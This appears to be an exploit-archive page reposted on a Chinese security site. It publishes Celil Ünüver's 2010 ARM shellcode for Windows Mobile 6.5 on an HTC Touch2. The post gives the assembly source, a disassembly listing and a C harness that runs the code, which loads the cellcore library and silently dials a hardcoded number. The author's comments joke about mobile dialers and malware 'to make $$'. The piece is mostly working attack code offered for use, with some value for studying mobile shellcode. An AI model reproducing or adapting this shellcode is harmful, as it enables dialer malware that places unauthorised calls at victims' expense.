首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Windows Mobile 6.5 TR Phone Call Shellcode
来源:www.securityarchitect.org 作者:Celil 发布时间:2010-09-28  

Title: Windows Mobile 6.5 TR Phone Call Shellcode
Author: Celil Ünüver
/*

Device: HTC Touch2
System: Windows Mobile 6.5 TR (WinCE 5.0.2)

Coded by Celil ‹n¸ver from SecurityArchitect

Contact:
 celilunuver[n*spam]gmail.com
 www.securityarchitect.org
 blog.securityarchitect.org


Notes: thats a PhoneCall Shellcode! Do you remember the time of dialers? Dial-up Modem times? ;)

now is it the time of mobile dialers and malwares to make $$ ? :)


  EXPORT start
  AREA .text, CODE
start
  ldr R12, =0x3f6272c
  adr r0, lib
  mov lr, pc
  mov pc, r12
  ldr r12, =0x2e806dc
  adr r0, num
  mov r3, #0
  mov r2, #0
  mov r1, #0
  mov lr, pc
  mov pc, r12

lib  dcb "c",0,"e",0,"l",0,"l",0,"c",0,"o",0,"r",0,"e",0,0,0,0,0
num  dcb "3",0,"1",0,"3",0,"3",0,"7",0,0,0
  ALIGN

  END

 dumpbin /disasm:

00011000: E59FC044 ldr       r12, [pc, #0x44]
00011004: E28F0020 add       r0, pc, #0x20
00011008: E1A0E00F mov       lr, pc
0001100C: E1A0F00C mov       pc, r12
00011010: E59FC038 ldr       r12, [pc, #0x38]
00011014: E28F0024 add       r0, pc, #0x24
00011018: E3A03000 mov       r3, #0
0001101C: E3A02000 mov       r2, #0
00011020: E3A01000 mov       r1, #0
00011024: E1A0E00F mov       lr, pc
00011028: E1A0F00C mov       pc, r12
0001102C: 00650063 rsbeq     r0, r5, r3, rrx
00011030: 006C006C rsbeq     r0, r12, r12, rrx
00011034: 006F0063 rsbeq     r0, pc, r3, rrx
00011038: 00650072 rsbeq     r0, r5, r2, ror r0
0001103C: 00000000 andeq     r0, r0, r0
00011040: 00310033 eoreqs    r0, r1, r3, lsr r0
00011044: 00330033 eoreqs    r0, r3, r3, lsr r0
00011048: 00000037 andeq     r0, r0, r7, lsr r0
0001104C: 03F6272C
00011050: 02E806DC rsceq     r0, r8, #0xDC, 12


"i don't think we have any imperfections; we perfectly are what we are."

*/

#include <stdio.h>
#include <windows.h>

int shellcode[] =
{
0xE59FC044,
0xE28F0020,
0xE1A0E00F,
0xE1A0F00C,
0xE59FC038,
0xE28F0024,
0xE3A03000,
0xE3A02000,
0xE3A01000,
0xE1A0E00F,
0xE1A0F00C,
0x00650063,
0x006C006C,
0x006F0063,
0x00650072,
0x00000000,
0x00310033,
0x00330033,
0x00000037,
0x03F6272C,
0x02E806DC,
};

int WINAPI WinMain( HINSTANCE hInstance,
                    HINSTANCE hPrevInstance,
                    LPTSTR    lpCmdLine,
                    int       nCmdShow)
{
    ((void (*)(void)) & shellcode)();

    return 0;
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Digital Music Pad Version 8.2.
·Gokhun ASP Stok v1.0 Multiple
·iworkstation Version 9.3.2.1.4
·BS.Player 2.56 (Build 1043) .m
·Fox Audio Player 0.8.0 .m3u De
·PDF Creator Pilot (PDFCreatorP
·Barracuda Networks Spam & Viru
·Realtek (InstallShield-RTCOMDL
·Microsoft Internet Explorer MS
·Yahoo! Messenger 10 (PhotoShar
·Ask Toolbar V 5.8.0.2304-1-123
·linux/x86 setreuid(0) and add
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved